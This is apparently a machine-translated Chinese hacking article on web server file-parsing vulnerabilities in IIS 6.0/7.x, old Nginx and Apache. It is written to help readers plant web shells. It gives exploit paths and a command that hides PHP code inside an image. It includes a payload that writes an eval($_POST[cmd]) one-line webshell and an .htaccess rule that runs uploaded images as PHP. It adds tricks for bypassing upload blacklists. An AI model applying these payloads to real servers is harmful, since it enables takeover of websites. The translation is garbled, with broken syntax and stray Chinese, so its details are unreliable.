Common server to resolve the vulnerability summary-vulnerability warning-the black bar safety net

ID MYHACK58:62201338349
Type myhack58
Reporter 佚名
Modified 2013-04-17T00:00:00


Author : laterain

[+]IIS6. 0

Directory resolution:/xx.asp/xx.jpg

xx.jpg can be replaced with any text file(e.g. xx.txt), the text content for the back door code

IIS6. 0 will be xx.jpg parsing of asp files.

Suffix resolution:/xx. asp;. jpg

IIS6. 0 would put such a suffix the file is successfully parsed as asp file.

Default resolution:/xx. asa

/xx. cer

/xx. cdx

IIS6. 0 default the executable file in addition to the asp also contains these three

Here you can contact using directory parsing vulnerability

/xx.asa/xx.jpg or /xx.cer/xx.jpg or xx. asa;. jpg

[+]IIS 7.0/IIS 7.5/Nginx <0.8.03

IIS 7.0/IIS 7.5/Nginx <0.8.03

In the default Fast-CGI open condition,in a file path(/xx.jpg)behind

加上 /xx.php,will /xx.jpg/xx.php parsed as a php file.

Common use of the method:

A picture and a write-back door code of the text files combined malicious text

Writing image binary code after, To avoid damage to the image file head and tail

Such as:

copy xx.jpg /b - + yy. txt/a xy.jpg

/b i.e., binary[binary]mode

/a that ascii mode

xx.jpg normal picture file

yy.txt content <? PHP fputs(fopen('shell.php','w'),

'<? php eval($_POST[cmd])?& gt;');?& gt;

Means for writing a content is <? php eval($_POST[cmd])?& gt; name

As a shell. php file

Find a place to upload xy.jpg ,then find the xy.jpg the address, in the address after /xx.php

You can perform malicious text. And then just in the picture directory of the generated word Trojan shell.php

Password cmd

[+]Nginx <0.8.03

In Fast-CGI to close the case, Nginx <0.8.03 remain parsing vulnerability

In a file path(/xx.jpg)后面 加上 %00.php

Will /xx.jpg%00.php parsed as a php file.


Suffix parsing: test. php. x1. x2. x3

The Apache will be from right to left determines the suffix, if x3 is non-identifiable suffix,

Then determine x2, until you find a recognizable suffix is reached, then the recognition

Suffix into the parsing test. php. x1. x2. x3 it will be parsed as php

Experience: php|php3|phtml much can be Apache parsing.

[+]Some other available

In the windows environment, xx.jpg[space] 或 xx.jpg. These two types of files are not allowed to exist

If such name, windows will default to remove the spaces or points, it is also can be use!

In to a windows host computer to upload data, you can capture to modify the file name, and later added a space

Or point, trying to bypass the blacklist, if the upload is successful, the final point or space will be eliminated, so you can

To get the shell. I remember Fck Php 2.6 there is extra space bypass vulnerability.

{Linux host no, Linux allows such a file exists}

If in Apache. htaccess can be executed by default does not perform, which is 90sec in a friend that

The, when I are not aware of, and can be uploaded, then you can try on

. htaccess write:

<FilesMatch “shell.jpg”>

SetHandler application/x-httpd-php


shell. jpg into your uploaded file, so the shell. jpg it can be parsed as a php file

[+]Bug fixes

In IIS 6.0 the following can be resolved /xx.asp:.jpg

{/xx.asp:.jpg such a file under Windows does not allow the presence of, the:. jpg is automatically removed

Rest/xx. asp}modified:

First Thank you for a nuclear attack alert

When uploading a/xx. asp: the. jpg file, and indeed:. jpg will disappear, but now the/xx. asp

There is no any content, because ... Bad explanation everyone see for yourself.